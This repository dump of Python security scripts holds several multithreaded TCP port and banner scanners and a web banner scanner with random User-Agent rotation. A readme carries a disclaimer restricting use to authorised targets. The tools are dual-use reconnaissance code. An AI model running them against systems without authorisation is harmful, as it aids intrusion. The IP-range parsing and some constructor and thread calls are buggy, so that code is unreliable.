get_a_port_isalive(self, ip, port): 71 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 72 | try: 73 | server.connect((ip, int(port))) 74 | # result = '[+] {0}:{1} open'.format(ip, port) 75 | # print(result) 76 | # return ('1', ip, port) 77 | # return result 78 | return True 79 | except Exception as e: 80 | # result = '[-] {0}:{1} close'.format(ip, port) 81 | # print(result) 82 | # return ('0', ip, port) 83 | # return result 84 | return False 85 | finally: 86 | server.close() 87 | 88 | # 获取banner,主要是为开放的端口进行获取开放的端口的banner 89 | def get_a_port_banner(self, ip, port): 90 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 91 | try: 92 | server.connect((ip, int(port))) 93 | banner = server.recv(1024).decode() 94 | return banner 95 | except Exception as e: 96 | return None # 空没有获取到banner 97 | finally: 98 | server.close() 99 | 100 | # 探端口,只探活 101 | def port_alive_scanner(self): 102 | while not self.queue.empty(): 103 | ip, port = self.queue.get() 104 | port_isalive = self.get_a_port_isalive(ip, port) 105 | if port_isalive is True: 106 | scan_result = '[+] {0}:{1} open'.format(ip, port) 107 | print(scan_result) 108 | return scan_result 109 | elif port_isalive is False: 110 | # scan_result = '[-] {0}:{1} close'.format(ip, port) 111 | # print(scan_result) 112 | # return scan_result 113 | pass 114 | 115 | # 探活+获取banner,先探活,然后获取banner 116 | def port_alive_and_banner_scanner(self): 117 | while not self.queue.empty(): 118 | ip, port = self.queue.get() 119 | port_isalive = self.get_a_port_isalive(ip, port) 120 | if port_isalive is True: 121 | port_banner = self.get_a_port_banner(ip, port) 122 | scan_result = '[+] {0}:{1} open {2}'.format(ip, port, port_banner) 123 | print(scan_result) 124 | return scan_result 125 | elif port_isalive is False: 126 | # scan_result = '[-] {0}:{1} close'.format(ip, port) 127 | # print(scan_result) 128 | # return scan_result 129 | pass 130 | 131 | 132 | if __name__ == '__main__': 133 | title = ''' 134 | python3 portscan.py -p 80,81 10.10.10.10 135 | python3 portscan.py -p 80-100,3380-3390 10.10.10.10 10.10.10.11 136 | python3 portscan.py -p 1-65535 10.10.10.10-20 137 | python3 portscan.py -p 80,90-100 10.10.10.10/24 138 | ''' 139 | parser = argparse.ArgumentParser(usage=title, description="Multithread Portscan,the defalut threads is 50.") 140 | parser.add_argument("-H", type=str, dest="hosts", required=True, help="Hosts to scan") 141 | parser.add_argument("-p", type=str, dest="ports", help="ports to scan") 142 | parser.add_argument("-s", "--simple", default=True, type=bool, dest="simple_scan", help="alive scan") 143 | parser.add_argument("-a", "-all", default=False, type=bool, dest="all_scan", help="banner scan") 144 | parser.add_argument("-t", "--thread", default=50, type=int, dest="threads", help="threads") 145 | parser.add_argument("--timeout", default=2, type=int, dest="timeout", help="timeout") 146 | args = parser.parse_args() 147 | Thread_maxnum = args.threads 148 | ips = args.hosts 149 | ports = args.ports 150 | timeout = 2 151 | if args.timeout != 0 and args.timeout > 0: 152 | timeout = args.timeout 153 | else: 154 | print("--timeout Setting error.") 155 | exit(1) 156 | 157 | IP_PORT_QUEUE = Queue() 158 | Portscanner = Myportscan(ips, ports, IP_PORT_QUEUE, timeout) 159 | threads = [] 160 | start_time = time.time() 161 | # 读取数据,存入管道 162 | Portscanner.queue_put() 163 | if args.simple_scan is True: 164 | for i in range(Thread_maxnum): 165 | thread = threading.Thread(target=Portscanner.port_alive_scanner) 166 | thread.start() 167 | threads.append(thread) 168 | for thread in threads: 169 | thread.join() 170 | elif args.all_scan is True: 171 | for i in range(Thread_maxnum): 172 | thread = threading.Thread(target=Portscanner.port_alive_and_banner_scanner) 173 | thread.start() 174 | threads.append(thread) 175 | for thread in threads: 176 | thread.join() 177 | -------------------------------------------------------------------------------- /Myportscan2.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import threading 3 | from queue import Queue 4 | import time 5 | import argparse 6 | 7 | # import argparse 8 | ''' 9 | 10 | 端口探测全类封装版,管道+探测 11 | 12 | 2021.7.27 13 | 实现多IP、IP段(10-20),C段 端口扫描+banner扫描 14 | 经过不断测试,发现一个问题 15 | 通过socket 发送包,如果认为目标,不响应则认为端口是关闭的, 16 | 但是有些端口是开放的,但是端口会回应你内容, 17 | 所以,如果不设置超时 通过s.recv(1024)会一直无响应,程序中断不了,一直在那卡着 18 | 19 | 2021.8.1 20 | 添加-f参数从文件读取多IP机制 21 | 22 | 默认不打印关闭端口信息 23 | 24 | ''' 25 | 26 | 27 | class Myportscan: 28 | def __init__(self, ips=None, ipfile=None, ports=None, queue=None, timeout=2): 29 | self.ips = ips 30 | self.ipfile = ipfile 31 | self.ports = ports 32 | self.queue = queue 33 | self.timeout = timeout 34 | socket.setdefaulttimeout(timeout) 35 | 36 | def get_port(self): 37 | # 80 - 100, 3380 - 3390 38 | port_list = [] 39 | port_segments = self.ports.split(',') 40 | for port_segment in port_segments: 41 | if '-' in port_segment: 42 | start, end = port_segment.split('-') 43 | for i in range(int(start), int(end) + 1): 44 | port_list.append(i) 45 | else: 46 | port_list.append(port_segment) 47 | 48 | return port_list 49 | 50 | def get_ip(self): 51 | # 10.10.10.10/24 10.10.10.10-20 10.10.10.10 10.10.10.11 52 | ip_section_list = [] 53 | ip_list = [] 54 | if self.ips is not None: 55 | ip_section_list.append(self.ips) 56 | elif self.ipfile is not None: 57 | with open(self.ipfile, 'r', encoding='utf-8') as f: 58 | for line in f: 59 | if line.strip() != '': 60 | ip_section_list.append(line.strip()) 61 | for ips in ip_section_list: 62 | if '/24' in ips: 63 | # 192.168.1.1/24 64 | ip_csection = ips.rsplit('.', 1)[0] 65 | # 将需要 ping 的 ip 加入队列 66 | for i in range(1, 256): 67 | ip_list.append(i) 68 | elif '-' in ips: 69 | # 192.168.1.2-10 70 | start_ip = ips.rsplit('-', 1) 71 | ip_csection, start = start_ip[0].rsplit('.', 1) 72 | end = int(start_ip[1]) + 1 73 | for i in range(int(start), end): 74 | ip_list.append(i) 75 | elif ',' in ips: 76 | iplist = ips.split(',') 77 | ip_list.extend(iplist) 78 | else: 79 | ip_list.append(ips) 80 | return ip_list 81 | 82 | def queue_put(self): 83 | ip_list = self.get_ip() 84 | port_list = self.get_port() 85 | for ip in ip_list: 86 | for port in port_list: 87 | self.queue.put((ip, port)) 88 | 89 | def get_a_port_isalive(self, ip, port): 90 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 91 | try: 92 | server.connect((ip, int(port))) 93 | # result = '[+] {0}:{1} open'.format(ip, port) 94 | # print(result) 95 | # return ('1', ip, port) 96 | # return result 97 | return True 98 | except Exception as e: 99 | # result = '[-] {0}:{1} close'.format(ip, port) 100 | # print(result) 101 | # return ('0', ip, port) 102 | # return result 103 | return False 104 | finally: 105 | server.close() 106 | 107 | # 获取banner,主要是为开放的端口进行获取开放的端口的banner 108 | def get_a_port_banner(self, ip, port): 109 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 110 | try: 111 | server.connect((ip, int(port))) 112 | banner = server.recv(1024).decode() 113 | return banner 114 | except Exception as e: 115 | return None # 空没有获取到banner 116 | finally: 117 | server.close() 118 | 119 | # 探端口,只探活 120 | def port_alive_scanner(self): 121 | while not self.queue.empty(): 122 | ip, port = self.queue.get() 123 | port_isalive = self.get_a_port_isalive(ip, port) 124 | if port_isalive is True: 125 | scan_result = '[+] {0}:{1} open'.format(ip, port) 126 | print(scan_result) 127 | return scan_result 128 | elif port_isalive is False: 129 | # scan_result = '[-] {0}:{1} close'.format(ip, port) 130 | # print(scan_result) 131 | # return scan_result 132 | pass 133 | 134 | # 探活+获取banner,先探活,然后获取banner 135 | def port_alive_and_banner_scanner(self): 136 | while not self.queue.empty(): 137 | ip, port = self.queue.get() 138 | port_isalive = self.get_a_port_isalive(ip, port) 139 | if port_isalive is True: 140 | port_banner = self.get_a_port_banner(ip, port) 141 | scan_result = '[+] {0}:{1} open {2}'.format(ip, port, port_banner) 142 | print(scan_result) 143 | return scan_result 144 | elif port_isalive is False: 145 | # scan_result = '[-] {0}:{1} close'.format(ip, port) 146 | # print(scan_result) 147 | # return scan_result 148 | pass 149 | 150 | 151 | if __name__ == '__main__': 152 | title = ''' 153 | python3 portscan.py -H 192.168.148.128/24 -p 10-90 154 | python3 portscan.py -H 192.168.148.128/24 -p 10-90 -s 155 | python3 portscan.py -H 192.168.148.128/24 -p 10-90 -a 156 | python3 portscan.py -H 192.168.148.128/24 -p 10-90 -t 100 157 | python3 portscan.py -H 10.10.10.10,10.10.10.11 -p 10-90 158 | python3 portscan.py -f ip.txt -p 10-90 -a 159 | ''' 160 | parser = argparse.ArgumentParser(usage=title, description="Multithread Portscan,the defalut threads is 50.") 161 | parser.add_argument("-f", "--file", default=None, type=str, dest="ipfile", help="IP file to scan") 162 | parser.add_argument("-H", "--host", type=str, dest="hosts", required=True, help="Hosts to scan") 163 | parser.add_argument("-p", "--port", type=str, dest="ports", help="ports to scan") 164 | parser.add_argument("-s", "--simple", default=True, type=bool, dest="simple_scan", help="alive scan") 165 | parser.add_argument("-a", "-all", default=False, type=bool, dest="all_scan", help="banner scan") 166 | parser.add_argument("-t", "--thread", default=50, type=int, dest="threads", help="threads") 167 | parser.add_argument("--timeout", default=2, type=int, dest="timeout", help="timeout") 168 | args = parser.parse_args() 169 | Thread_maxnum = args.threads 170 | ipfile = args.ipfile 171 | ips = args.hosts 172 | ports = args.ports 173 | timeout = 2 174 | if args.timeout != 0 and args.timeout > 0: 175 | timeout = args.timeout 176 | else: 177 | print("--timeout Setting error.") 178 | exit(1) 179 | 180 | IP_PORT_QUEUE = Queue() 181 | Portscanner = Myportscan(ips, ports, IP_PORT_QUEUE, timeout) 182 | threads = [] 183 | start_time = time.time() 184 | # 读取数据,存入管道 185 | Portscanner.queue_put() 186 | if args.simple_scan is True: 187 | for i in range(Thread_maxnum): 188 | thread = threading.Thread(target=Portscanner.port_alive_scanner) 189 | thread.start() 190 | threads.append(thread) 191 | for thread in threads: 192 | thread.join() 193 | elif args.all_scan is True: 194 | for i in range(Thread_maxnum): 195 | thread = threading.Thread(target=Portscanner.port_alive_and_banner_scanner) 196 | thread.start() 197 | threads.append(thread) 198 | for thread in threads: 199 | thread.join() 200 | -------------------------------------------------------------------------------- /Myportscan单线程函数版.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | import socket 4 | import queue 5 | 6 | Thread_maxnum = 50 7 | 8 | 9 | # 获取端口开放情况 10 | def portScanner(host, port): 11 | try: 12 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 13 | s.connect((host, port)) 14 | # print(s.recv(1024)) 15 | print('[+] %d open' % port) 16 | s.close() 17 | except: 18 | print('[-] %d close' % port) 19 | 20 | 21 | # 获取端口banner 22 | def get_a_port_banner(ip, port): 23 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 24 | try: 25 | server.connect((ip, int(port))) 26 | banner = server.recv(1024).decode() 27 | return banner 28 | except Exception as e: 29 | return None # 空没有获取到banner 30 | finally: 31 | server.close() 32 | 33 | 34 | def main(): 35 | # setdefaulttimeout(1) 36 | for p in [6002, 6003]: 37 | portScanner('192.168.148.128', p) 38 | 39 | 40 | if __name__ == '__main__': 41 | main() 42 | -------------------------------------------------------------------------------- /Myportscan端口扫描 扫描封装到类单线程版本.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | 4 | '''端口扫描 扫描封装到类单线程版本''' 5 | 6 | class Myportscan: 7 | def __init__(self, ip='', port='', timeout=2): 8 | self.ip = ip 9 | self.port = port 10 | self.timeout = timeout 11 | socket.setdefaulttimeout(timeout) 12 | 13 | def get_port_isalive(self, ip, port): 14 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | try: 16 | server.connect((ip, int(port))) 17 | # result = '[+] {0}:{1} open'.format(ip, port) 18 | # print(result) 19 | # return ('1', ip, port) 20 | # return result 21 | return True 22 | except Exception as e: 23 | # result = '[-] {0}:{1} close'.format(ip, port) 24 | # print(result) 25 | # return ('0', ip, port) 26 | # return result 27 | return False 28 | finally: 29 | server.close() 30 | 31 | # 获取banner,主要是为开放的端口进行获取开放的端口的banner 32 | def get_port_banner(self, ip, port): 33 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 34 | try: 35 | server.connect((ip, int(port))) 36 | banner = server.recv(1024).decode() 37 | return banner 38 | except Exception as e: 39 | return None # 空没有获取到banner 40 | finally: 41 | server.close() 42 | 43 | # 探开放+获取banner,先探活,然后获取banner 44 | def port_alive_and_banner_scan(self, ip, port): 45 | if self.get_port_isalive(ip, port) is True: 46 | port_banner = self.get_port_banner(ip, port) 47 | result = '[+] {0}:{1} open {2}'.format(ip, port, port_banner) 48 | return result 49 | elif self.get_port_isalive(ip, port) is False: 50 | result = '[-] {0}:{1} close'.format(ip, port) 51 | return result 52 | 53 | # 探端口,只探活 54 | def port_alive_scan(self, ip, port): 55 | if self.get_port_isalive(ip, port) is True: 56 | result = '[+] {0}:{1} open'.format(ip, port) 57 | return result 58 | elif self.get_port_isalive(ip, port) is False: 59 | result = '[-] {0}:{1} close'.format(ip, port) 60 | return result 61 | 62 | 63 | 64 | 65 | def get_ip_status(ip, port): 66 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 67 | # server.settimeout(3) 68 | try: 69 | server.connect((ip, int(port))) 70 | print(server.recv(1024)) 71 | print(server) 72 | # print(server.recv(1024).decode()) 73 | print('[+] {0}:{1} open'.format(ip, port)) 74 | except Exception as err: 75 | # print(err) 76 | print('[-] {0}:{1} close'.format(ip, port)) 77 | finally: 78 | server.close() 79 | 80 | 81 | if __name__ == '__main__': 82 | host = '192.168.148.128' 83 | socket.setdefaulttimeout(1) 84 | # for port in range(20, 100): 85 | for port in [6002, 6003, 6004, 6005]: 86 | get_ip_status(host, port) -------------------------------------------------------------------------------- /Myportscan端口探测封装到类版.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import threading 3 | from queue import Queue 4 | import sys 5 | import time 6 | import argparse 7 | 8 | # import argparse 9 | ''' 10 | 经过不断测试,发现一个问题 11 | 通过socket 发送包,如果认为目标,不响应则认为端口是关闭的, 12 | 但是有些端口是开放的,但是端口会回应你内容, 13 | 所以,如果不设置超时 通过s.recv(1024)会一直无响应,程序中断不了,一直在那卡着 14 | 15 | 单端口探测封装到类版 16 | 17 | ''' 18 | 19 | 20 | class Myportscan: 21 | def __init__(self, ip='', port='', timeout=2): 22 | self.ip = ip 23 | self.port = port 24 | self.timeout = timeout 25 | socket.setdefaulttimeout(timeout) 26 | 27 | def get_a_port_isalive(self, ip, port): 28 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 29 | try: 30 | server.connect((ip, int(port))) 31 | # result = '[+] {0}:{1} open'.format(ip, port) 32 | # print(result) 33 | # return ('1', ip, port) 34 | # return result 35 | return True 36 | except Exception as e: 37 | # result = '[-] {0}:{1} close'.format(ip, port) 38 | # print(result) 39 | # return ('0', ip, port) 40 | # return result 41 | return False 42 | finally: 43 | server.close() 44 | 45 | # 获取banner,主要是为开放的端口进行获取开放的端口的banner 46 | def get_a_port_banner(self, ip, port): 47 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 48 | try: 49 | server.connect((ip, int(port))) 50 | banner = server.recv(1024).decode() 51 | return banner 52 | except Exception as e: 53 | return None # 空没有获取到banner 54 | finally: 55 | server.close() 56 | 57 | # 探开放+获取banner,先探活,然后获取banner 58 | def port_alive_and_banner_scan(self, ip, port): 59 | if self.get_a_port_isalive(ip, port) is True: 60 | port_banner = self.get_a_port_banner(ip, port) 61 | result = '[+] {0}:{1} open {2}'.format(ip, port, port_banner) 62 | return result 63 | elif self.get_a_port_isalive(ip, port) is False: 64 | result = '[-] {0}:{1} close'.format(ip, port) 65 | return result 66 | 67 | # 探端口,只探活 68 | def port_alive_scan(self, ip, port): 69 | if self.get_a_port_isalive(ip, port) is True: 70 | result = '[+] {0}:{1} open'.format(ip, port) 71 | return result 72 | elif self.get_a_port_isalive(ip, port) is False: 73 | result = '[-] {0}:{1} close'.format(ip, port) 74 | return result 75 | 76 | 77 | def get_port(ports): 78 | # 80 - 100, 3380 - 3390 79 | port_list = [] 80 | port_segments = ports.split(',') 81 | for port_segment in port_segments: 82 | if '-' in port_segment: 83 | start, end = port_segment.split('-') 84 | for i in range(int(start), int(end) + 1): 85 | port_list.append(i) 86 | else: 87 | port_list.append(port_segment) 88 | 89 | return port_list 90 | 91 | 92 | def get_ip(ips): 93 | # 10.10.10.10/24 10.10.10.10-20 10.10.10.10 10.10.10.11 94 | ip_list = [] 95 | if '/' in ips: 96 | # 192.168.1.1/24 97 | ip_csection = ips.rsplit('.', 1)[0] 98 | # 将需要 ping 的 ip 加入队列 99 | for i in range(1, 256): 100 | ip_list.append(i) 101 | elif '-' in ips: 102 | # 192.168.1.2-10 103 | start_ip = ips.rsplit('-', 1) 104 | ip_csection, start = start_ip[0].rsplit('.', 1) 105 | end = int(start_ip[1]) + 1 106 | for i in range(int(start), end): 107 | ip_list.append(i) 108 | else: 109 | ip_list.append(ips) 110 | return ip_list 111 | 112 | 113 | def alive_scanner(queue, timeout=2): 114 | while not queue.empty(): 115 | ip, port = queue.get() 116 | scanner = Myportscan(timeout) 117 | scan_result = scanner.port_alive_scan(ip, port) 118 | print(scan_result) 119 | 120 | 121 | def alive_and_banner_scanner(queue, timeout): 122 | while not queue.empty(): 123 | ip, port = queue.get() 124 | scanner = Myportscan(timeout) 125 | scan_result = scanner.port_alive_and_banner_scan(ip, port) 126 | print(scan_result) 127 | 128 | 129 | if __name__ == '__main__': 130 | title = ''' 131 | Multithread ping,the defalut threads is 50. 132 | Usage: 133 | python3 portscan.py -p 80,81 10.10.10.10 134 | python3 portscan.py -p 80-100,3380-3390 10.10.10.10 10.10.10.11 135 | python3 portscan.py -p 1-65535 10.10.10.10-20 136 | python3 portscan.py -p 80,90-100 10.10.10.10/24 137 | ''' 138 | 139 | parser = argparse.ArgumentParser(usage="it's usage tip.", description=title) 140 | parser.add_argument("-H", type=str, dest="hosts", required=True, help="Hosts to scan") 141 | parser.add_argument("-p", type=str, dest="ports", help="ports to scan") 142 | parser.add_argument("-s", "--simple", default=True, type=bool, dest="simple_scan", help="alive scan") 143 | parser.add_argument("-a", "-all", default=False, type=bool, dest="all_scan", help="banner scan") 144 | parser.add_argument("-t", "--thread", default=50, type=int, dest="threads", help="threads") 145 | parser.add_argument("--timeout", default=2, type=int, dest="timeout", help="timeout") 146 | args = parser.parse_args() 147 | Thread_maxnum = args.threads 148 | ip_list = get_ip(args.hosts) 149 | port_list = get_port(args.ports) 150 | timeout = 2 151 | if args.timeout != 0 and args.timeout > 0: 152 | timeout = args.timeout 153 | else: 154 | print("--timeout Setting error.") 155 | exit(1) 156 | 157 | IP_PORT_QUEUE = Queue() 158 | 159 | for i in ip_list: 160 | for j in port_list: 161 | IP_PORT_QUEUE.put((i, j)) 162 | threads = [] 163 | start_time = time.time() 164 | 165 | if args.simple_scan is True: 166 | # print(2) 167 | for i in range(Thread_maxnum): 168 | # print(1) 169 | thread = threading.Thread(target=alive_scanner, args=(IP_PORT_QUEUE, timeout,)) 170 | thread.start() 171 | threads.append(thread) 172 | for thread in threads: 173 | thread.join() 174 | elif args.all_scan is True: 175 | for i in range(Thread_maxnum): 176 | thread = threading.Thread(target=alive_and_banner_scanner(), args=(IP_PORT_QUEUE, timeout)) 177 | thread.start() 178 | threads.append(thread) 179 | for thread in threads: 180 | thread.join() 181 | -------------------------------------------------------------------------------- /Mywebscan.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import argparse 3 | from queue import Queue 4 | import threading 5 | import random 6 | import csv 7 | import datetime, os 8 | from bs4 import BeautifulSoup 9 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 10 | 11 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 12 | 13 | ''' 14 | 全类多线程 web banner信息扫描 15 | ''' 16 | 17 | 18 | class My_web_banner_scan: 19 | def __init__(self, queue=None, url_file=None, csvfile=None, timeout=2, saveheadbody=False): 20 | self.timeout = timeout 21 | self.queue = queue 22 | self.url_file = url_file # 没用到 23 | self.csvfile = csvfile 24 | self.saveheadbody = saveheadbody 25 | self.initialize_outputfile() 26 | 27 | # 生成随机UA 28 | def random_useragent(self): 29 | USER_AGENTS = [ 30 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", 31 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)", 32 | "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", 33 | "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)", 34 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)", 35 | "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)", 36 | "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)", 37 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)", 38 | "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6", 39 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1", 40 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0", 41 | "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5", 42 | "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6", 43 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", 44 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20", 45 | "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52", 46 | ] 47 | return random.choice(USER_AGENTS) 48 | 49 | # http/https请求获取banner 50 | def get_web_banner(self, url): 51 | # 网站的头部Head信息,Title标题信息,Body内容信息,并保持文件里面(支持http / https) 52 | header = {'User-Agent': self.random_useragent()} 53 | # print(header) 54 | # request = requests.session() 55 | # requests.exceptions.ReadTimeout # 下载文件超时,4秒 56 | # requests.exceptions.ConnectTimeout # 连接超时,2秒 57 | res = requests.get(url, headers=header, timeout=2) 58 | res.encoding = "utf-8" 59 | status_code = str(res.status_code) 60 | html = res.text 61 | soup = BeautifulSoup(html, "lxml") 62 | # print(type(soup.head.title.string)) 63 | try: 64 | title = str(soup.head.title.string) 65 | timeout = 0 66 | except AttributeError as e: 67 | print(url, "request timeout,Can set --timeout") 68 | title = "" 69 | timeout = 1 70 | # for k, v in res.headers.items(): 71 | # print(k, ': ', v) 72 | # return True 73 | if self.saveheadbody is False: 74 | # result = {"URL": url, "status_code": status_code, "title": title, "headers": "", "body": ""} 75 | result = [url, status_code, title, timeout, "", ""] 76 | else: 77 | headers = res.headers 78 | result = [url, status_code, title, timeout, headers, html] 79 | return result 80 | 81 | # 获取数据传入管道 82 | def get_url_from_file(self, url_file): 83 | with open(url_file, 'r', encoding='utf-8') as f: 84 | for line in f: 85 | self.queue.put(line.strip()) 86 | 87 | def initialize_outputfile(self): 88 | # 如果csvfile是一个文件对象,它应该用newline =''打开。 89 | with open(self.csvfile, 'w', newline='')as f: 90 | header = ['URL', 'status_code', 'title', 'timeout', 'headers', 'body'] 91 | # newline的作用是防止每次插入都有空行 92 | writer = csv.writer(f) 93 | writer.writerow(header) 94 | 95 | def write_file(self, data): 96 | # 如果csvfile是一个文件对象,它应该用newline =''打开。 97 | with open(self.csvfile, 'a+', newline='')as f: 98 | # fieldnames = {'URL', 'status_code', 'title', 'timeout', 'headers', 'body'} 99 | # newline的作用是防止每次插入都有空行 100 | writer = csv.writer(f) 101 | writer.writerow(data) 102 | 103 | def web_banner(self): 104 | while not self.queue.empty(): 105 | url = self.queue.get() 106 | # bot = self.web_banner_scan() 107 | result = self.get_web_banner(url) 108 | # print(result) 109 | if self.csvfile is not None: 110 | self.write_file(result) 111 | else: 112 | print(result) 113 | 114 | 115 | if __name__ == '__main__': 116 | usage = """ 117 | GET url status code,title,body And write csv file. 118 | 119 | """ 120 | parser = argparse.ArgumentParser(usage=usage, description="") 121 | parser.add_argument("-f", "--file", type=str, default=None, dest="file", help="URL file") 122 | parser.add_argument("-hb", "--headbody", default=False, action="store_true", dest="saveheadbody", 123 | help="Store header and body") 124 | parser.add_argument("-o", "--output", type=str, default=datetime.datetime.now().strftime("%Y%m%d%H%M%S") + '.csv', 125 | dest="outputfile", 126 | help="Result to csv") 127 | # parser.add_argument("-u", "--url", type=str, default=None, dest="url", help="URL") 128 | parser.add_argument("-t", "--thread", type=int, default=50, dest="threads", help="Threads") 129 | parser.add_argument("--timeout", type=int, default=2, dest="timeout", help="Request timeout") 130 | args = parser.parse_args() 131 | Thread_maxnum = args.threads 132 | timeout = 2 133 | thread_list = [] 134 | URL_QUEUE = Queue() 135 | # URL_QUEUE.put("https://www.baidu.com") 136 | # URL_QUEUE.put("https://www.taobao.com") 137 | # URL_QUEUE.put("https://www.taobao.com") 138 | # URL_QUEUE.put("https://www.taobao.com") 139 | # URL_QUEUE.put("https://www.taobao.com") 140 | if args.timeout != 0 and args.timeout > 0: 141 | timeout = args.timeout 142 | else: 143 | print("--timeout Setting error.") 144 | exit(1) 145 | web_banner_bot = My_web_banner_scan(queue=URL_QUEUE, url_file=args.file, csvfile=args.outputfile, timeout=timeout, 146 | saveheadbody=args.saveheadbody) 147 | web_banner_bot.get_url_from_file(args.file) 148 | for i in range(Thread_maxnum): 149 | thread = threading.Thread(target=web_banner_bot.web_banner) 150 | thread.start() 151 | thread_list.append(thread) 152 | for thread in thread_list: 153 | thread.join() 154 | 155 | print("[+] Output save in", os.getcwd() + args.outputfile) 156 | -------------------------------------------------------------------------------- /images/640-16432009920046.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/images/640-16432009920046.webp -------------------------------------------------------------------------------- /images/640-16432009920047.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/images/640-16432009920047.webp -------------------------------------------------------------------------------- /images/640-16432009920048.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/images/640-16432009920048.webp -------------------------------------------------------------------------------- /images/Z2O安全攻防交流群群聊qq二维码.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/images/Z2O安全攻防交流群群聊qq二维码.png -------------------------------------------------------------------------------- /images/image-20220427111016139.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/images/image-20220427111016139.png -------------------------------------------------------------------------------- /images/公众号.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/images/公众号.jpg -------------------------------------------------------------------------------- /images/微信图片_20220427110850.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/images/微信图片_20220427110850.jpg -------------------------------------------------------------------------------- /readme.md: -------------------------------------------------------------------------------- 1 | # Mytools 2 | 3 | 自己工作中编写的各种脚本,**欢迎star**⭐ 4 | 5 | 从名字基本可以判断出类型,多线程的都使用了生产者消费者模型,对于想开发工具的小伙伴可以提供一个参考。 6 | 7 | 8 | 9 | **免责声明:** 10 | 11 | 利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。 12 | 13 | 只供对已授权的目标使用测试,对未授权目标的测试作者不承担责任,均由使用本人自行承担。 14 | 15 | ## 一起交流 16 | 17 | 感兴趣的可以关注 **Z2O安全攻防** 公众号回复“**加群**”,添加Z2OBot 小K自动拉你加入**Z2O安全攻防交流群**分享更多好东西。 18 | 19 | ![图片](images/640-16432009920048.webp) 20 | 21 | ![公众号](images/公众号.jpg) 22 | 23 | ![Z2O安全攻防交流群群聊qq二维码](images/Z2O安全攻防交流群群聊qq二维码.png) 24 | 25 | 团队建立了知识星球,不定时更新最新漏洞复现,手把手教你,同时不定时更新POC、内外网渗透测试骚操作。感兴趣的可以加一下。 26 | 27 | ![image-20220427111016139](images/image-20220427111016139.png) 28 | 29 | 30 | 31 | ![图片](images/640-16432009920046.webp) 32 | 33 | ![图片](images/640-16432009920047.webp) 34 | 35 | ![微信图片_20220427110850](images/微信图片_20220427110850.jpg) 36 | 37 | 38 | 39 | 40 | 41 